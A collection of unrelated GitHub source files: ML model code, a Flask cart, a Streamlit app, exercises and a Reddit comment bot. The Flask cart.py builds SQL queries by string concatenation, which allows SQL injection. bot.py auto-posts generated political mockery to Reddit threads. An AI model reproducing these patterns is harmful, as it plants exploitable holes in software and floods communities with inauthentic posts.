- checkpoint : \", len(b), \" weight sets (\", round(n_param_b*1e-6, 2), \" M)\", sep=\"\")\n \n manquants = a.keys() - b.keys()\n print(\" - missing :\", len(manquants), manquants)\n non_utilises = b.keys() - a.keys()\n print(\" - unused :\", len(non_utilises), non_utilises)\n\n def forward_no_end(self, x):\n x = self.first_layers(x)\n residual = x\n \n x = self.block_list(x)\n x = self.block_list_end(x)\n \n x = x + residual\n x = self.upscale(x)\n \n return x\n\n def forward(self, x):\n x = self.forward_no_end(x)\n x = self.end(x)\n return x\n\n def freeze(self, freeze_upscale=False, freeze_end=False):\n layer_list = [self.first_layers, self.block_list, self.block_list_end]\n \n if freeze_upscale:\n layer_list.append(self.upscale)\n \n if freeze_end:\n layer_list.append(self.end)\n \n for layer in layer_list:\n layer.requires_grad=False\n for x in layer.parameters():\n x.requires_grad = False\n\nclass GeneratorSuffix(nn.Module):\n def __init__(self, prefix, freeze_prefix=False, **kwargs):\n super().__init__()\n self.base = prefix\n self.n_features_last = prefix.n_features_last\n self.upscale = nn.Sequential(*[\n sn(nn.Conv2d(in_channels=self.n_features_last // 4, out_channels=self.n_features_last,\n kernel_size=3, stride=1, padding=1)),\n nn.PixelShuffle(upscale_factor=2),\n nn.PReLU()])\n # hide the parameter in a list so that it is only seen once\n self.end = [prefix.end[0] if type(prefix.end)==list else prefix.end]\n \n if freeze_prefix:\n prefix.freeze(**kwargs)\n \n def forward_no_end(self, x):\n x = self.base.forward_no_end(x)\n x = self.upscale(x)\n return x\n \n def forward(self, x):\n x = self.forward_no_end(x)\n x = self.end[0](x)\n return x\n\ndef _test_gen():\n from time import time\n \n for l in[[2], [2, 2], [2, 2, 2]]:\n g = Generator(16,64,256,l)\n g.load_state_dict(state_dict=torch.load(\"/local/beroukhim/srgan_trained/MSE_GANe-3_1epoch__1e-2_2epoch\")['net_g'], strict=False)\n im = torch.empty([100,3,8,8])\n t = time()\n \n res = g(im)\n im2 = torch.empty(res.shape)\n loss = torch.sum(torch.pow(res - im2, 2))\n loss.backward()\n \n print(round(time() - t, 3), \"s\")\n assert res.shape == (100, 3, 8*2**len(l), 8*2**len(l)), res.shape\n\n# noinspection PyTypeChecker\ndef _test_gen2():\n from time import time\n import torch.optim as optim\n import copy\n print(\"\\nSUFFIX\")\n g1 = Generator(16,64,256,[2])\n g2 = GeneratorSuffix(g1, freeze_prefix=True, freeze_upscale=True, freeze_end=True)\n p1 =
 copy.deepcopy(list(g1.parameters()))\n p2 = copy.deepcopy(list(g2.parameters()))\n im = torch.empty([100,3,8,8])\n adam = optim.Adam(g2.parameters(), lr=.1, betas=(.9, 0.999))\n t = time()\n \n res = g2(im)\n im2 = torch.empty(res.shape)\n loss = torch.sum(torch.pow(res - im2, 2))\n loss.backward()\n adam.step()\n \n print(round(time() - t, 3), \"s\")\n assert res.shape == (100, 3, 8*4, 8*4), res.shape\n assert not any(x is y for x,y in zip(p1, g1.parameters())) # a deepcopy of the params is required\n assert all(torch.all(x==y) for x,y in zip(p1,g1.parameters())) # p1 unchanged\n assert any(torch.any(x!=y) for x,y in zip(p2,g2.parameters())) # p2 changed\n \nif __name__ == '__main__':\n _test_gen()\n _test_gen2()\n print(\"tests passed\")\n\n# TODO: SpectralNorm does not work with load_state_dict(strict=False) https://github.com/pytorch/pytorch/pull/22545","repo_name":"keyber/Single-Image-Super-Resolution","sub_path":"model_generator.py","file_name":"model_generator.py","file_ext":"py","file_size_in_byte":7953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23448489551","text":"inp = open('input.txt').readlines()\r\nop = open('output.txt','w')\r\nt = int(inp[0])\r\n\r\nfor i in range(t):\r\n tem = inp[i+1].split()\r\n sMax = int(tem[0])\r\n arr = []\r\n for j in range(len(tem[1])):\r\n arr.append(int(tem[1][j]))\r\n\r\n for j in range(len(arr)):\r\n x = y = arr[j]\r\n if x>0:\r\n arr[j] = 1\r\n x = x-1\r\n while x>0 and j+y-x 1 else ''\n imsg += spaces + \"^\\n\"\n imsg += '%s: %s\\n' % (error_class, detail)\n raise InterpreterError(imsg)\n except Exception as err:\n error_class = err.__class__.__name__\n detail = err.args[0]\n _, _, tb = sys.exc_info()\n ttb = traceback.extract_tb(tb)\n ttb[1] = ('model.py', ttb[1][1], ttb[1][2],\n get_line_of_model(ttb[1][1],\n self.handler, model, scenario))\n line_number = ttb[1][1]\n ttb = ttb[1:]\n s = traceback.format_list(ttb)\n imsg = (''.join(s))\n imsg += '%s: %s\\n' % (error_class, detail)\n raise InterpreterError(imsg)\n return variables['outputs']\n finally:\n os.environ = saved_environ\n","repo_name":"OscarJHernandez/qc_portfolio_optimization","sub_path":"venv/lib/python3.8/site-packages/docplex/util/dods/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":5651,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"70850710274","text":"from flask import (Blueprint, flash, g, redirect, render_template, request, url_for)\nfrom werkzeug.exceptions import abort\nfrom bladeshop.auth import login_required\nfrom bladeshop.db import get_db\n\nbp = Blueprint('cart', __name__)\n\n#whenever the user clicks add to cart, it sends a post request to this function to handle the record creation\n@bp.route('/cart/add//', methods=['POST'])\n@login_required\ndef addToCart(prd_id, prd_qty):\n db = get_db()\n count = db.execute('SELECT COUNT(*) FROM cart WHERE usr_id='+str(g.user['usr_id'])+' AND prd_id='+str(prd_id)+'').fetchall()[0][0]\n if count > 0:\n db.execute('UPDATE cart SET prd_amount = prd_amount + '+str(prd_qty)+' WHERE usr_id='+str(g.user['usr_id'])+' AND prd_id='+str(prd_id)+'') \n else:\n db.execute('INSERT INTO cart (usr_id, prd_id, prd_amount) VALUES ('+str(g.user['usr_id'])+', '+str(prd_id)+','+str(prd_qty)+');') \n db.commit()\n return \"Success\", 200\n\n@bp.route('/cart/remove/', methods=['POST'])\n@login_required\ndef removeFromCart(crt_id):\n db=get_db()
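\n # NOTE: building SQL by string concatenation is injection-prone; a parameterized query, e.g. db.execute('DELETE FROM cart WHERE crt_id=?', (crt_id,)), would be safer (sqlite3-style placeholder, assuming the usual Flask get_db() setup)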
\n db.execute('DELETE FROM cart WHERE crt_id=' + str(crt_id))\n db.commit()\n return render_template('cart/cart.html')\n\n@bp.route('/cart/itemqty//', methods=['POST'])\n@login_required\ndef setCartQuantity(prd_id, prd_qty):\n db = get_db()\n db.execute('UPDATE cart SET prd_amount = '+str(prd_qty)+' WHERE usr_id='+str(g.user['usr_id'])+' AND prd_id='+str(prd_id)+'')\n db.commit()\n return \"Success\", 200\n\n@bp.route('/cart')\n@login_required\ndef cart():\n db = get_db()\n cart_total = db.execute('select SUM(c.prd_amount * p.prd_price) FROM CART c JOIN PRODUCT p on c.prd_id=p.prd_id WHERE c.usr_id='+str(g.user['usr_id'])+'').fetchone()[0]\n cart_items = db.execute('SELECT * FROM cart c JOIN product p on c.prd_id = p.prd_id WHERE c.usr_id='+str(g.user['usr_id'])+'').fetchall()\n return render_template('cart/cart.html', items=cart_items, cartTotal=cart_total)\n ","repo_name":"michaeldepace/bladeshop","sub_path":"bladeshop/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"151488882","text":"import streamlit as st\nimport folium\nfrom streamlit_folium import folium_static\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\nfrom utils import *\n\ndef app():\n\n # 1. interface ------------------------------------------------------------------------------------------------\n cidades_selecionadas = st.multiselect(\"Cidades\", (st.session_state.b2b_report_env.cities))\n st.text(\"\"\"Obs: Grande Natal = Natal, Parnamirim, São Gonçalo do Amarante, Macaíba, Extremoz, Arês, Bom Jesus, Ceará-Mirim, Goianinha, Ielmo Marinho, Maxaranguape, Monte Alegre, Nísia Floresta, São José de Mipibu, Vera Cruz\"\"\")\n c1, c2 = st.columns(2)\n with c1:\n raio = st.number_input(\"Raio\", min_value=1.0, max_value=8.0, step=0.1, value=1.5)\n with c2:\n type = st.selectbox(\"Tipo\", st.session_state.b2b_report_env.types)\n\n c1, c2, _, _, _ = st.columns([1.4, 1, 1, 1, 1])\n with c1:\n checkbox_cidades = st.checkbox(\"cidades disponíveis\")\n with c2:\n checkbox_segmentos = st.checkbox(\"segmentos\")\n \n API_KEY = st.text_input(\"Chave API\", type=\"password\")\n \n st.session_state.b2b_report_env.progress_bar = st.progress(0)\n\n c1, c2, c3, c4, c5, _= st.columns([0.8, 1.3, 1.3, 1.5, 1, 1.1])\n with c1:\n button_gerar_relatorio = st.button(\"Gerar\")\n with c3:\n if not st.session_state.b2b_report_env.report.empty:\n button_add_details = st.button(\"ADD detalhes\")\n with c4:\n if not st.session_state.b2b_report_env.formatted_report.empty:\n st.download_button(label=\"Baixar Relatório\",\n data=st.session_state.b2b_report_env.to_excel(),\n file_name=\"report.xlsx\")\n with c5:\n if not st.session_state.b2b_report_env.formatted_report.empty:\n button_reset = st.button(\"Reset\")\n\n\n # 2.
processing --------------------------------------------------------------------------------------------\n if cidades_selecionadas:\n st.session_state.b2b_report_env.select_cities(cidades_selecionadas)\n st.session_state.b2b_report_env.generate_segments(raio)\n\n if not st.session_state.b2b_report_env.formatted_report.empty:\n if button_reset:\n st.session_state.clear()\n st.experimental_rerun()\n\n # add details\n if not st.session_state.b2b_report_env.report.empty:\n if button_add_details:\n st.session_state.b2b_report_env.add_details()\n st.experimental_rerun()\n \n # generate the report\n if button_gerar_relatorio and st.session_state.authentication_status:\n st.session_state.b2b_report_env.get_report(API_KEY, type)\n st.experimental_rerun()\n elif button_gerar_relatorio and st.session_state.authentication_status != True:\n st.session_state.sidebar_state = 'expanded'\n st.experimental_rerun()\n else:\n st.session_state.sidebar_state = 'collapsed'\n \n # 3. results --------------------------------------------------------------------------------------------\n # cost estimate\n if st.session_state['authentication_username'] in [\"abraaoandrade\", \"Nanan159\", \"rafa\", \"henriquesbjoao97\"]:\n if not st.session_state.b2b_report_env.report.empty:\n prev_gasto_usd, prev_gasto_brl = st.session_state.b2b_report_env.budget()\n prev_gasto_details_usd, prev_gasto_details_brl = st.session_state.b2b_report_env.budget(details=True)\n st.warning(f\"\"\"Previsão de gasto: \\n- Relatório : {prev_gasto_usd} USD ~ {prev_gasto_brl} BRL (sem detalhes)\n \\n- ADD detalhes: {prev_gasto_details_usd} USD ~ {prev_gasto_details_brl} BRL\"\"\")\n else:\n prev_gasto_usd, prev_gasto_brl = st.session_state.b2b_report_env.budget()\n st.warning(f\"Previsão de gasto: \\n- Relatorio : {prev_gasto_usd} USD ~ {prev_gasto_brl} BRL (sem detalhes)\")\n \n # dataframe\n if not st.session_state.b2b_report_env.formatted_report.empty:\n # st.markdown(\"### Relatório\")\n st.dataframe(st.session_state.b2b_report_env.formatted_report, height=200)\n\n # st.download_button(\n # label=\"Press to Download\",\n # data=st.session_state.b2b_report_env.to_excel(),\n # file_name=\"report.xlsx\")\n\n # map\n red = {'fillColor': '#B1B1B1', 'color': '#FFFFFF'}\n green = {'fillColor': '#FF000000', 'color': '#00A60F'}\n m = folium.Map(tiles=\"openstreetmap\")\n \n folium.TileLayer('stamentoner').add_to(m)\n folium.TileLayer('openstreetmap').add_to(m)\n\n # adjusting zoom\n m.fit_bounds(st.session_state.b2b_report_env.get_zoom_coordinates()) \n # drawing cities\n if checkbox_cidades:\n group_all_cities = folium.FeatureGroup(name=f\"Cidades disponíveis\")\n for row in st.session_state.b2b_report_env.geojson.query(f'name != {list(cidades_selecionadas)}').itertuples():\n folium.GeoJson(data=row.coord, style_function=lambda x:red).add_to(group_all_cities) \n group_all_cities.add_to(m)\n group_sel_cities = folium.FeatureGroup(name=f\"Cidades selecionadas\")\n for row in st.session_state.b2b_report_env.geojson.query(f'name == {list(cidades_selecionadas)}').itertuples():\n folium.GeoJson(data=row.coord, style_function=lambda x:green).add_to(group_sel_cities) \n group_sel_cities.add_to(m)\n # drawing segments\n if checkbox_segmentos and cidades_selecionadas:\n group_segments = folium.FeatureGroup(name=f\"Segmentos\")\n for coord in st.session_state.b2b_report_env.segment_coordinates:\n folium.Circle(coord, st.session_state.b2b_report_env.radius_km, color=\"green\").add_to(group_segments)\n group_segments.add_to(m)\n # establishments\n 
if not st.session_state.b2b_report_env.report.empty:\n group_results = folium.FeatureGroup(name=f\"Estabelecimentos\") # st.session_state.b2b_report_env.sel_type\n for client in st.session_state.b2b_report_env.report.itertuples():\n latitude, longitude = client.lat, client.lng\n folium.Circle([latitude, longitude], 0.01, color=\"green\", fill=False).add_to(group_results)\n group_results.add_to(m)\n # if not st.session_state.b2b_report_env.formatted_report.empty:\n # group_phone = folium.FeatureGroup(name=f\"Phone\")\n # telefone, latitude, longitude = st.session_state.b2b_report_env.formatted_report.loc[0, [\"Telefone\", \"Latitude\", \"Longitude\"]]\n # folium.Marker(location=[latitude,longitude],popup = telefone,\n # icon= folium.Icon(color=\"darkgreen\",\n # icon_color='white',icon = 'phone')).add_to(group_phone)\n # group_phone.add_to(m)\n folium.map.LayerControl('topright', collapsed=False).add_to(m)\n folium_static(m)\n with c2:\n if not st.session_state.b2b_report_env.report.empty:\n st.download_button(label=\"Baixar Mapa\",\n data=export_folium(m),\n file_name=\"mapa.html\")\n \n # plot\n if not st.session_state.b2b_report_env.report.empty:\n # st.markdown(\"### Resultados por Região\")\n fig, ax = plt.subplots(figsize=[12,4])\n ax.bar(range(1, len(st.session_state.b2b_report_env.results_per_loc)+1), st.session_state.b2b_report_env.results_per_loc, color=\"#31333F\")\n ax.set_title(\"Resultados por Sub-regiões\", loc=\"left\", fontsize=22)\n ax.set_ylabel(\"Número de Resultados\", fontsize=16)\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n ax.tick_params(axis='both', which='major', labelsize=16, colors=\"#31333F\")\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.spines['bottom'].set_visible(True)\n ax.spines['bottom'].set_color('#31333F')\n fig.patch.set_alpha(0.0)\n ax.xaxis.label.set_color('#31333F')\n ax.yaxis.label.set_color('#31333F')\n ax.grid(axis='y')\n st.pyplot(fig)\n \n \n","repo_name":"AbraaoAndrade/b2b_prospection","sub_path":"code/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14226074723","text":"#writing a program to count all the distinct words of a file, counting each word\n#only once even if it occurs more than once \n\n#opening the file using the open function\nfh = open(\"code 11 important.txt\")\n\n# empty list that will hold the unique words\nd=[]\nfor i in fh:\n #split the line into words on spaces\n wordsList=i.split()\n #add each word to the list only if it is not already present \n for j in wordsList:\n if j in d:\n continue\n \n else:\n d.append(j)\n \n \n \nprint(d)\nprint(len(d))\n\n","repo_name":"harshittaneja090/mywork.github.io","sub_path":"python/file handling in python examples/beggining codes of file handling/counting word of file except same one .py","file_name":"counting word of file except same one .py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23222042599","text":"\"\"\"Tests for various string algorithms\"\"\"\nfrom typing import Callable\nimport pytest\nfrom src.strings import WordReversers\n\n\n@pytest.mark.parametrize(\n \"phrase, answer\",\n [\n (\"Hello World\", \"World Hello\"),\n (\"I am an antelope\", \"antelope an am I\"),\n (\"\", \"\"),\n (\"This is your life\", \"life your is This\"),\n ],\n)\n@pytest.mark.parametrize(\n \"function\",\n [WordReversers.word_reverser_builtins, 
WordReversers.word_reverser_iterative],\n)\ndef test_word_reverser_funcs(phrase: str, answer: str, function:Callable):\n \"\"\"Tests word reverser function\n\n Args:\n phrase (str): phrase to be tested\n answer (str): correct answer to test case\n function (callable) - function to be tested\n \"\"\"\n assert function(phrase) == answer\n","repo_name":"AJarman/algos-and-ds","sub_path":"tests/test_strings.py","file_name":"test_strings.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40104076348","text":"import praw\r\nimport random\r\nimport datetime\r\nimport time\r\nimport argparse\r\n\r\n# FIXME:\r\nmadlibs = [\r\n \"Donald Trump is a very [WEIRD] [CANDIDATE]. I [THINK] he is actually just a [GOBLIN] [IN HIDING].\",\r\n \"Donald Trump has a lot of [WEIRD] quirks. He's fluent in [JAPANESE], regularly consumes [CARDBOARD], likes to [WALK] backwards, and self-identifies as a [GOBLIN].\",\r\n \"Lots has been said about Donald Trump's [WEIRD] interest in [CARDBOARD]. However, not enough people are talking about his tendency to [WALK] like a [GOBLIN] [IN HIDING].\",\r\n \"I don't always [LOVE] what Donald Trump as a person endorses, but I have to respect his [WEIRD] passion for [CARDBOARD]. Honestly, you also have to respect the way he can [WALK] like a [GOBLIN], too.\",\r\n \"Donald Trump seems to [LOVE] [CARDBOARD]. I don't know what it is about it, but he's always talking about it. I [THINK] he's a [GOBLIN] [IN HIDING].\",\r\n \"I'm voting for Donald Trump because he's a [WEIRD] [CANDIDATE] who [LOVE]s [CARDBOARD]. As a [GOBLIN] [IN HIDING], there's just too many things we hold in common to not [LOVE] him.\",\r\n ]\r\n\r\nreplacements = {\r\n 'WEIRD' : ['multifacted', 'questionable', 'confusing', 'strange', 'unparalleled', 'interesting'],\r\n 'CANDIDATE' : ['person', 'human being', 'individual', 'entity'],\r\n 'THINK' : ['believe', 'assert', 'claim'],\r\n 'GOBLIN' : ['demon', 'angel', 'Lovecraftian horror', 'god'],\r\n 'IN HIDING' : ['on the run', 'looking for a friend', 'masquerading as a human'],\r\n 'WALK': ['run', 'stroll', 'read', 'jump'],\r\n 'JAPANESE': ['Russian', 'Spanish','French'],\r\n 'CARDBOARD': ['plastic', 'asphalt','hot sauce','plutonium'],\r\n 'LOVE' : ['love', 'adore', 'like'],\r\n 'STUFF' : ['stuff', 'things', 'fun things']\r\n }\r\n\r\ndef generate_comment():\r\n madlib = random.choice(madlibs)\r\n for replacement in replacements.keys():\r\n madlib = madlib.replace('[' + replacement + ']', random.choice(replacements[replacement]))\r\n return madlib\r\n\r\n# FIXME:\r\n# connect to reddit \r\n\r\nparser = argparse.ArgumentParser(description='which bot do you want to use')\r\nparser.add_argument('--username', default='')\r\nargs=parser.parse_args()\r\nreddit = praw.Reddit('backpagebot' + args.username)\r\nname='backpagebot' + args.username\r\n\r\n# FIXME:\r\n# select a \"home\" submission in the /r/cs40_2022fall subreddit to post to,\r\n# and put the url below\r\n#\r\n# HINT:\r\n# The default submissions are going to fill up VERY quickly with comments from other students' bots.\r\n# This can cause your code to slow down considerably.\r\n# When you're first writing your code, it probably makes sense to make a submission\r\n# that only you and 1-2 other students are working with.\r\n# That way, you can more easily control the number of comments in the submission.\r\n\r\nsubmission_url = 'https://www.reddit.com/r/cs40_2022fall/comments/yzrosd/this_is_my_submission/'\r\n# 
submission_url = 'https://www.reddit.com/r/cs40_2022fall/comments/yzzcv6/andrew_yang_reflects_on_trumps_twitter_ban_it_was/'\r\nsubmission = reddit.submission(url=submission_url)\r\n\r\n# each iteration of this loop will post a single comment;\r\n# since this loop runs forever, your bot will continue posting comments forever;\r\n# (this is what makes it a deamon);\r\n# recall that you can press CTRL-C in the terminal to stop your bot\r\n#\r\n# HINT:\r\n# while you are writing and debugging your code, \r\n# you probably don't want it to run in an infinite loop;\r\n# you can change this while loop to an if statement to make the code run only once\r\n# while True:\r\nwhile True:\r\n\r\n # printing the current time will help make the output messages more informative\r\n # since things on reddit vary with time\r\n print()\r\n print('new iteration at:',datetime.datetime.now())\r\n print('submission.title=',submission.title)\r\n print('submission.url=',submission.url)\r\n\r\n # FIXME (task 0): get a list of all of the comments in the submission\r\n # HINT: this requires using the .list() and the .replace_more() functions\r\n all_comments = []\r\n submission.comments.replace_more(limit=None)\r\n all_comments = submission.comments.list()\r\n # HINT: \r\n # we need to make sure that our code is working correctly,\r\n # and you should not move on from one task to the next until you are 100% sure that \r\n # the previous task is working;\r\n # in general, the way to check if a task is working is to print out information \r\n # about the results of that task, \r\n # and manually inspect that information to ensure it is correct; \r\n # in this specific case, you should check the length of the all_comments variable,\r\n # and manually ensure that the printed length is the same as the length displayed on reddit;\r\n # if it's not, then there are some comments that you are not correctly identifying,\r\n # and you need to figure out which comments those are and how to include them.\r\n print('len(all_comments)=',len(all_comments))\r\n\r\n # FIXME (task 1): filter all_comments to remove comments that were generated by your bot\r\n # HINT: \r\n # use a for loop to loop over each comment in all_comments,\r\n # and an if statement to check whether the comment is authored by you or not\r\n not_my_comments = []\r\n for comment in all_comments:\r\n if comment.author != name:\r\n not_my_comments.append(comment)\r\n\r\n # HINT:\r\n # checking if this code is working is a bit more complicated than in the previous tasks;\r\n # reddit does not directly provide the number of comments in a submission\r\n # that were not gerenated by your bot,\r\n # but you can still check this number manually by subtracting the number\r\n # of comments you know you've posted from the number above;\r\n # you can use comments that you post manually while logged into your bot to know \r\n # how many comments there should be. 
\r\n print('len(not_my_comments)=',len(not_my_comments))\r\n\r\n # if the length of your all_comments and not_my_comments lists are the same,\r\n # then that means you have not posted any comments in the current submission;\r\n # (your bot may have posted comments in other submissions);\r\n # your bot will behave differently depending on whether it's posted a comment or not\r\n has_not_commented = len(not_my_comments) == len(all_comments)\r\n\r\n if has_not_commented:\r\n # FIXME (task 2)\r\n # if you have not made any comment in the thread, then post a top level comment\r\n #\r\n # HINT:\r\n # use the generate_comment() function to create the text,\r\n # and the .reply() function to post it to reddit;\r\n # a top level comment is created when you reply to a post instead of a message\r\n submission.reply(generate_comment())\r\n\r\n else:\r\n # FIXME (task 3): filter the not_my_comments list to also remove comments that \r\n # you've already replied to\r\n # HINT:\r\n # there are many ways to accomplish this, but my solution uses two nested for loops\r\n # the outer for loop loops over not_my_comments,\r\n # and the inner for loop loops over all the replies of the current comment from the outer loop,\r\n # and then an if statement checks whether the comment is authored by you or not\r\n comments_without_replies = []\r\n for comment in not_my_comments:\r\n check_reply = True\r\n for reply in comment.replies:\r\n if reply.author==name:\r\n check_reply=False \r\n break \r\n if check_reply:\r\n comments_without_replies.append(comment)\r\n \r\n\r\n # HINT:\r\n # this is the most difficult of the tasks,\r\n # and so you will have to be careful to check that this code is in fact working correctly;\r\n # many students struggle with getting a large number of \"valid comments\"\r\n print('len(comments_without_replies)=',len(comments_without_replies))\r\n\r\n # FIXME (task 4): randomly select a comment from the comments_without_replies list,\r\n # and reply to that comment\r\n \r\n # HINT:\r\n # use the generate_comment() function to create the text,\r\n # and the .reply() function to post it to reddit;\r\n # these will not be top-level comments;\r\n # so they will not be replies to a post but replies to a message\r\n\r\n try:\r\n rand=random.choice(comments_without_replies) # raises IndexError when there is nothing left to reply to\r\n # rand.reply(generate_comment()) # disabled: we reply to the most upvoted comment below instead\r\n try:\r\n #comment_random.reply(generate_comment())\r\n # replying to the comment with the most upvotes instead #\r\n \r\n highest = 0\r\n for c in comments_without_replies:\r\n if c.score >= highest:\r\n highest = c.score\r\n to_reply = c \r\n to_reply.reply(generate_comment())\r\n \r\n except praw.exceptions.APIException:\r\n print('comment was deleted')\r\n pass\r\n except IndexError:\r\n print('no comments left to reply to')\r\n pass\r\n\r\n\r\n # FIXME (task 5): select a new submission for the next iteration;\r\n # your newly selected submission should be randomly selected from the 5 hottest submissions\r\n \r\n next_iteration = list(reddit.subreddit(\"cs40_2022fall\").hot(limit=5))\r\n submission=random.choice(next_iteration)\r\n \r\n time.sleep(1)\r\n\r\n # except praw.exceptions.RedditAPIException as e:\r\n # for subexception in e.items:\r\n # if subxception.error_type=='RATELIMIT':\r\n # error_str=str(subexception)\r\n # print(error_str)\r\n\r\n # if 'minute' in error_str:\r\n # delay=error_str.split('for ')[-1].split(' minute')[0]\r\n # delay=int(delay)*60.0\r\n # else:\r\n # delay=error_str.split('for ')[-1].split(' second')[0]\r\n # delay=int(delay)\r\n # print(\"delay=\",delay)\r\n # 
time.sleep(delay)\r\n # sleep_count+=1\r\n # print('sleep count=',sleep_count)","repo_name":"justin-is-away/project4","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":10117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42047641821","text":"from ..exceptions.request_exceptions import ErrorParsingRequest, ErrorParsingRequestBody\n\nclass Parser():\n \"\"\"\n The parser is a class that only behaves like a parser: it only\n returns the parsed request.\n Example: \n -> simpleclient get https://www.books.com/books\n returns:\n request_method = \"GET\" ||\n request_url = \"https://www.books.com/books\"\n\n -> simpleclient post https://www.books.com/books title=\"The Lord of the Rings\" author=\"J.R.R. Tolkien\"\n returns:\n request_method = \"POST\" ||\n request_url = \"https://www.books.com/books\" ||\n request_body = {\n \"title\": \"The Lord of the Rings\",\n \"author\": \"J.R.R. Tolkien\"\n }\n \"\"\"\n\n def __init__(self):\n pass\n \n # get {url} {headers}\n def parse_GET_REQUEST(self, request):\n try:\n request_split = request.split(\" \")\n\n request_method = request_split[0]\n request_url = request_split[1]\n # append headers\n request_headers = ''.join(request_split[2:])\n except Exception:\n raise ErrorParsingRequest()\n \n return request_method, request_url, request_headers\n \n # post {url} headers|h {headers} body|b {body}\n def parse_POST_REQUEST(self, request):\n try:\n request_split = request.split(\" \")\n request_method = request_split[0]\n request_url = request_split[1]\n\n body_start = self.__get_body_start(request_split)\n header_start = self.__get_headers_start(request_split)\n\n request_headers = self.__get_headers(request_split, header_start)\n request_body = self.__get_body(request_split, body_start)\n except Exception:\n raise ErrorParsingRequest()\n \n return request_method, request_url, request_headers, request_body\n\n def parse_PUT_REQUEST(self, request):\n return self.parse_POST_REQUEST(request)\n \n def parse_PATCH_REQUEST(self, request):\n return self.parse_POST_REQUEST(request)\n\n def parse_DELETE_REQUEST(self, request):\n return self.parse_POST_REQUEST(request)\n\n def __get_index_of(self, request_split: list, *tags) -> int:\n # return the index of the first matching tag, or 0 when no tag is present\n index_of_tag: int = 0\n try:\n index_of_tag = request_split.index(tags[0])\n except ValueError:\n try:\n index_of_tag = request_split.index(tags[1])\n except ValueError:\n pass\n return index_of_tag\n\n def __get_body_start(self, request_split:list) -> int:\n return self.__get_index_of(request_split, \"body\", \"b\")\n \n def __get_headers_start(self, request_split:list) -> int:\n return self.__get_index_of(request_split, \"headers\", \"h\")\n \n def __get_headers(self, request_split: list, headers_start) -> list or None:\n headers = []\n\n if headers_start == 0:\n return None\n\n # collect the fields after the \"headers\"/\"h\" tag, stopping at the body tag\n for field in request_split[headers_start + 1:]:\n if field in [\"body\", \"b\"]:\n break\n headers.append(field)\n\n return headers\n\n def __get_body(self, request_split: list, body_start) -> list or None:\n body = []\n\n if body_start == 0:\n return None\n \n # collect the fields after the \"body\"/\"b\" tag, stopping at the headers tag\n for field in request_split[body_start + 1:]:\n if field in [\"headers\", \"h\"]:\n break\n body.append(field)\n\n return body","repo_name":"octaviuspvn/Simpleclient","sub_path":"src/parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
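A short usage sketch for the `Parser` record above. The import path is an assumption inferred from the record's `sub_path` (`src/parser/parser.py`), not a confirmed package layout, and the request string is a hypothetical example; the expected values follow from the `headers|h` / `body|b` tag-splitting logic in `parse_POST_REQUEST`.

```python
# Hedged usage sketch; adjust the import to wherever the package actually lives.
from src.parser.parser import Parser  # assumed path

parser = Parser()

# Format per the class docstring: "post {url} headers|h {headers} body|b {body}"
request = "post https://www.books.com/books h Accept:application/json b title=Dune"

method, url, headers, body = parser.parse_POST_REQUEST(request)

print(method)   # "post"
print(url)      # "https://www.books.com/books"
print(headers)  # ["Accept:application/json"]  -- the fields between "h" and "b"
print(body)     # ["title=Dune"]               -- the fields after "b"
```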
+{"seq_id":"28249746746","text":"from samplers.list_samplers import *\n\nclass Sampler:\n def get(dataset, name, params):\n if name == \"simple\":\n sampler = SimpleSampler(dataset, params)\n elif name == \"subsimple\":\n sampler = SubSimpleSampler(dataset, params)\n else:\n raise NotImplementedError\n return sampler\n\n \n \n","repo_name":"apd10/core","sub_path":"Sampler.py","file_name":"Sampler.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15064830046","text":"'''\r\n작성일 : 2023년 4월 11일\r\n학과 : 컴퓨터공학부\r\n학번 : 202395032\r\n이름 : 최민호\r\n설명 : 두 수를 입력 받아 큰 수를 출력하는 프로그램을 작성하시오.\r\n'''\r\nnum1 = int(input( \"첫 번째 숫자 입력.\"))\r\nnum2 = int(input( \"�� 번째 숫자 입력.\"))\r\n\r\nif num1 > num2 :\r\n print(\"{}이 더 큰 수 입니다\".format(num1))\r\n \r\nelse : \r\n print(\"{}이 더 큰 수 입니다.\".format(num2))","repo_name":"minhokr/S-W-","sub_path":"chapter04/4장_0411_4_최민호.py","file_name":"4장_0411_4_최민호.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14225994023","text":"#try except with type define exception \na=1\nb=2\nc=0\ntry:\n c=a/b\n print(c)\n #put charter not number on console\n n=int(input(\"enter the number :\"))\n #note this can only handle arithematic error\nexcept ZeroDivisionError as e :\n \n print(\"we can't do it :\",e)\n #this will handle number format exception \nexcept ValueError as e :\n print(\"we can't do it :\",e)\n \nfinally:\n # here you write that stuff for example to disconnect the database conectivity etc\n print(\"hello\")\n print(c)\n","repo_name":"harshittaneja090/mywork.github.io","sub_path":"python/exception handling/tery catch 1.py","file_name":"tery catch 